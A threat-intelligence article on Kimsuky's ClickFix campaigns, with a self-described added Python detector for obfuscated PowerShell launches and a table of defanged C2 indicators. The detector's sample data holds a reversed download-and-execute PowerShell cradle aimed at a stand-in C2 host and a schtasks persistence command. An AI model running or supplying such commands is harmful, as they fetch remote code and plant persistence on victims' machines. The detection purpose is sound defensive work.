Kimsuky Hackers Employ ClickFix Technique to Run Malicious Scripts on Victim Devices

The North Korean state-sponsored hacker collective Kimsuky has been found to use a deceptive technique called “ClickFix” to compromise victim machines in a number of concerning cyberattacks.

First documented by Proofpoint in April 2024, ClickFix manipulates users into executing malicious scripts themselves by disguising the steps as legitimate troubleshooting guides or secure document verification processes.

This psychological manipulation tactic, often tied to Kimsuky’s ongoing “BabyShark” threat activity, has evolved into a global menace, with state-sponsored actors from Iran and Russia also adopting it, as revealed in subsequent reports by Sekoia and Proofpoint in 2024 and 2025.

A Sophisticated Social Engineering Tactic Unveiled

The Genians Security Center (GSC) flagged this activity in early 2025, underscoring the urgent need for robust endpoint detection and response (EDR) strategies to counter such obfuscated malware and abnormal behaviors.

Kimsuky’s ClickFix campaigns often begin with meticulously crafted spear-phishing emails, as seen in a January 2025 attack targeting a South Korean expert in diplomacy.

Attack Scenario

Posing as an East Asia correspondent for a Swiss newspaper, the attacker engaged the victim in prolonged communication before delivering a malicious URL containing a Visual Basic Script (VBS) file.

This script, obfuscated with random string insertions like “7539518426” to evade detection, executed commands to download payloads from a command-and-control (C2) server, establish persistence via scheduled tasks, and exfiltrate user data.

From Spear-Phishing to PowerShell Exploits

By March 2025, the group shifted to a more insidious ClickFix variant, impersonating a U.S. national security aide and tricking victims into pasting malicious PowerShell commands from a provided “Code.txt” file under the guise of accessing secure documents.

Malicious File Delivered via pCloud

These commands, obscured through reverse-order obfuscation, mirrored earlier VBS patterns and connected to C2 servers like raedom[.]store, revealing consistent tactics across campaigns.

Another instance involved a fake defense job portal displaying popups that guided users to install Chrome Remote Desktop, enabling attackers to gain remote access via Secure Shell (SSH).

Such methods highlight Kimsuky’s adaptability in exploiting user trust and bypassing traditional security measures.

Linguistic cues, including North Korean terminology like “래일” (tomorrow) and “지령” (command), further attribute these attacks to the group, emphasizing the role of cultural and contextual analysis in threat attribution.

The ClickFix tactic, classified under MITRE ATT&CK as User Execution: Malicious Copy and Paste (T1204.004), poses a significant challenge due to its reliance on social engineering rather than direct exploits.

Genian EDR has proven effective in tracking these threats, offering visibility into PowerShell execution and subsequent processes like cmd.exe and schtasks.exe, while mapping C2 communications for actionable mitigation.
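The process-chain visibility described above, combined with the reverse-order obfuscation noted earlier, lends itself to a simple detection rule. The following is an added example (not Genian's or any vendor's code) that scores constructed Sysmon-style process-creation events: a PowerShell process launched interactively from explorer.exe, a reverse-join idiom in its command line, payload keywords that only appear once the command line is read backwards, and follow-on cmd.exe/schtasks.exe children. All PIDs, paths and the c2.example.invalid host are constructed sample values.

```python
import re

# Constructed Sysmon-style process-creation events (hypothetical, not real telemetry); the
# reversed payload mimics the reverse-order obfuscation seen in the campaign described above.
PAYLOAD = "iex (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/a')"
EVENTS = [
    {"pid": 4100, "ppid": 900, "image": "explorer.exe", "cmd": "explorer.exe"},
    {"pid": 4312, "ppid": 4100, "image": "powershell.exe",
     "cmd": "powershell.exe -w hidden -c \"$s='%s';&([scriptblock]::Create(-join $s[-1..-$s.Length]))\"" % PAYLOAD[::-1]},
    {"pid": 4400, "ppid": 4312, "image": "cmd.exe", "cmd": "cmd.exe /c schtasks /create /sc minute /tn Update /tr C:\\Users\\Public\\u.vbs"},
    {"pid": 4410, "ppid": 4400, "image": "schtasks.exe", "cmd": "schtasks /create /sc minute /tn Update /tr C:\\Users\\Public\\u.vbs"},
    {"pid": 5000, "ppid": 4100, "image": "powershell.exe", "cmd": "powershell.exe -c Get-ChildItem C:\\Temp"},
]

KEYWORDS = ("iex", "invoke-expression", "downloadstring", "frombase64string", "webclient", "schtasks")
REVERSE_IDIOM = re.compile(r"\[-1\.\.-|\[array\]::reverse", re.IGNORECASE)  # reverse-join / Array.Reverse idioms
FOLLOW_ON = {"cmd.exe", "schtasks.exe", "wscript.exe", "mshta.exe"}

def keyword_hits(text):
    low = text.lower()
    return [k for k in KEYWORDS if k in low]

def descendants(events, pid):
    # Images of every process transitively spawned under pid.
    found, frontier = [], [pid]
    while frontier:
        cur = frontier.pop()
        for e in events:
            if e["ppid"] == cur:
                found.append(e["image"].lower()); frontier.append(e["pid"])
    return found

def analyze(events):
    """Return {pid: [indicators]} for powershell.exe launches with two or more ClickFix indicators."""
    by_pid = {e["pid"]: e for e in events}
    verdicts = {}
    for e in events:
        if e["image"].lower() != "powershell.exe":
            continue
        ind = []
        parent = by_pid.get(e["ppid"])
        if parent and parent["image"].lower() == "explorer.exe":
            ind.append("interactive_launch")  # typed/pasted by the user rather than run from a script
        if REVERSE_IDIOM.search(e["cmd"]):
            ind.append("reverse_join_idiom")
        fwd = keyword_hits(e["cmd"])
        rev = [k for k in keyword_hits(e["cmd"][::-1]) if k not in fwd]  # visible only when read backwards
        ind += ["keyword:" + k for k in fwd] + ["reversed_keyword:" + k for k in rev]
        ind += ["spawned:" + img for img in descendants(events, e["pid"]) if img in FOLLOW_ON]
        if len(ind) >= 2:
            verdicts[e["pid"]] = ind
    return verdicts
```

The benign `Get-ChildItem` launch from explorer.exe collects only one indicator and is not flagged, while the obfuscated launch is flagged on the parent, the reverse-join idiom, the reversed keywords and the schtasks.exe child.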

As Kimsuky continues to refine its approach, as evident in a June 2025 attack mimicking a Korean web portal’s security interface, organizations must prioritize security awareness training and proactive endpoint protection to prevent unwitting execution of malicious scripts.

Indicators of Compromise (IoCs)

Type         Value
MD5          56233bac07f4f9c43585e485e70b6169, a523bf5dca0f2a4ace0cf766d9225343 (and others)
C2 Domains   konamo[.]xyz, raedom[.]store, securedrive.fin-tech[.]com (and others)
C2 IPs       1.223.129[.]234, 103.149.98[.]247, 115.92.4[.]123 (and others)
